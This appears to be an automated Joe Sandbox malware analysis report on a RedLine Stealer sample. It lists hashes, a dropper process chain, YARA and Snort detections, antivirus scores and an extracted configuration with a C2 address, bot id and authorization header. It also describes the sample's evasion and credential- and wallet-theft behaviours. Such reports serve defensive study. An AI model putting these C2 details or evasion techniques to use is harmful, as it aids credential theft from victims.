Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iOqzwbUlln.exe

Overview

General Information

Sample Name:iOqzwbUlln.exe
Original Sample Name:fc3e0027ffead1129accedcb4814e96f.exe
Analysis ID:815872
MD5:fc3e0027ffead1129accedcb4814e96f
SHA1:e4c0e5996cb68ef0a79648a6c01e9f0c906986db
SHA256:fdb606c65f84e10b023a3c77a553791291373175953f5c2e98134ebb623d64d1
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • iOqzwbUlln.exe (PID: 1592 cmdline: C:\Users\user\Desktop\iOqzwbUlln.exe MD5: FC3E0027FFEAD1129ACCEDCB4814E96F)
    • szV94FU13.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe MD5: 43AC4F54070D2E111D56AF37CF9C2765)
      • stL82bL52.exe (PID: 4916 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe MD5: 8906052E48565395A2A7E5B0D6584C7E)
        • sQm37qN82.exe (PID: 5108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe MD5: 64653075A4A9CF43333AE22B968159AB)
          • iDa05Vg46.exe (PID: 5072 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe MD5: CA6D279F0C8A205BFA0F8878D8F7BA2A)
          • kGO12fD60.exe (PID: 6048 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe MD5: 1DC889EA2A05C7C4D829060CABE98814)
  • rundll32.exe (PID: 6028 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3588 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5088 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3912 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1a438:$pat14: , CommandLine:
        • 0x134ad:$v2_1: ListOfProcesses
        • 0x1328c:$v4_3: base64str
        • 0x13e05:$v4_4: stringKey
        • 0x11b63:$v4_5: BytesToStringConverted
        • 0x10d76:$v4_6: FromBase64
        • 0x12098:$v4_8: procName
        • 0x1281f:$v5_5: FileScanning
        • 0x11d6c:$v5_7: RecordHeaderField
        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
        SourceRuleDescriptionAuthorStrings
        00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
            • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
            00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 A8 88 44 24 2B 88 44 24 2F B0 A9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              Click to see the 12 entries
              SourceRuleDescriptionAuthorStrings
              5.2.kGO12fD60.exe.5130000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                5.2.kGO12fD60.exe.5130000.6.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x2a9e2:$pat14: , CommandLine:
                • 0x1cac9:$v2_1: ListOfProcesses
                • 0x1b1ef:$v4_3: base64str
                • 0x1b1ae:$v4_4: stringKey
                • 0x1b1f9:$v4_5: BytesToStringConverted
                • 0x1b1e4:$v4_6: FromBase64
                • 0x1c784:$v4_8: procName
                • 0x19ed6:$v5_5: FileScanning
                • 0x1a0f4:$v5_7: RecordHeaderField
                • 0x1a026:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                5.2.kGO12fD60.exe.4bb0000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  5.2.kGO12fD60.exe.4bb0000.4.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x2b8ca:$pat14: , CommandLine:
                  • 0x1d9b1:$v2_1: ListOfProcesses
                  • 0x1c0d7:$v4_3: base64str
                  • 0x1c096:$v4_4: stringKey
                  • 0x1c0e1:$v4_5: BytesToStringConverted
                  • 0x1c0cc:$v4_6: FromBase64
                  • 0x1d66c:$v4_8: procName
                  • 0x1adbe:$v5_5: FileScanning
                  • 0x1afdc:$v5_7: RecordHeaderField
                  • 0x1af0e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  5.2.kGO12fD60.exe.2206cde.3.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 31 entries
                    No Sigma rule has matched
                    Timestamp:193.233.20.23192.168.2.44123496952043234 02/27/23-11:39:10.429997
                    SID:2043234
                    Source Port:4123
                    Destination Port:49695
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4193.233.20.234969541232043231 02/27/23-11:39:21.135506
                    SID:2043231
                    Source Port:49695
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4193.233.20.234969541232043233 02/27/23-11:39:08.913244
                    SID:2043233
                    Source Port:49695
                    Destination Port:4123
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                    Source: iOqzwbUlln.exeReversingLabs: Detection: 66%
                    Source: iOqzwbUlln.exeVirustotal: Detection: 57%Perma Link
                    Source: iOqzwbUlln.exeAvira: detected
                    Source: 193.233.20.23:4123Virustotal: Detection: 8%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeReversingLabs: Detection: 74%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeVirustotal: Detection: 68%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeReversingLabs: Detection: 61%
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeVirustotal: Detection: 53%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exeReversingLabs: Detection: 43%
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exeVirustotal: Detection: 50%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeReversingLabs: Detection: 58%
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exeReversingLabs: Detection: 43%
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeReversingLabs: Detection: 61%
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeReversingLabs: Detection: 43%
                    Source: iOqzwbUlln.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeJoe Sandbox ML: detected
                    Source: 3.3.sQm37qN82.exe.45a7de1.0.unpackAvira: Label: TR/Patched.Gen
                    Source: 2.3.stL82bL52.exe.458de20.0.unpackAvira: Label: TR/Patched.Gen
                    Source: 1.3.szV94FU13.exe.443b820.0.unpackAvira: Label: TR/Patched.Gen
                    Source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.23:4123", "Bot Id": "ramon", "Authorization Header": "3197576965d9513f115338c233015b40"}
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E82F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00E82F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_000C2F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_001F2F1D
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_00DE2F1D

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeUnpacked PE file: 5.2.kGO12fD60.exe.400000.0.unpack
                    Source: iOqzwbUlln.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: iOqzwbUlln.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: 'C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb0Xp source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: wextract.pdb source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: iOqzwbUlln.exe, stL82bL52.exe.1.dr, sQm37qN82.exe.2.dr, szV94FU13.exe.0.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, iDa05Vg46.exe, 00000004.00000000.317923256.0000000000322000.00000002.00000001.01000000.00000007.sdmp, iDa05Vg46.exe.3.dr
                    Source: Binary string: _.pdb source: kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\pacokicewiyo4-jub\cuhepasax\lalakexinej68\viz62 neg.pdb source: stL82bL52.exe, 00000002.00000003.316888493.000000000452A000.00000004.00000020.00020000.00000000.sdmp, mlf76Mf25.exe.2.dr
                    Source: Binary string: C:\vicirulupixe-he.pdb source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
                    Source: Binary string: WC:\vicirulupixe-he.pdb0Xp source: szV94FU13.exe, 00000001.00000003.315638424.0000000004391000.00000004.00000020.00020000.00000000.sdmp, sQm37qN82.exe, 00000003.00000003.317740077.00000000045A5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000000.341977935.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, kGO12fD60.exe.3.dr, nAT03lr78.exe.1.dr
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E82390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_000C2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_001F2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00DE2390

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49695 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49695 -> 193.233.20.23:4123
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.23:4123 -> 192.168.2.4:49695
                    Source: Malware configuration extractorURLs: 193.233.20.23:4123
                    Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                    Source: Joe Sandbox ViewIP Address: 193.233.20.23 193.233.20.23
                    Source: global trafficTCP traffic: 192.168.2.4:49695 -> 193.233.20.23:4123
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
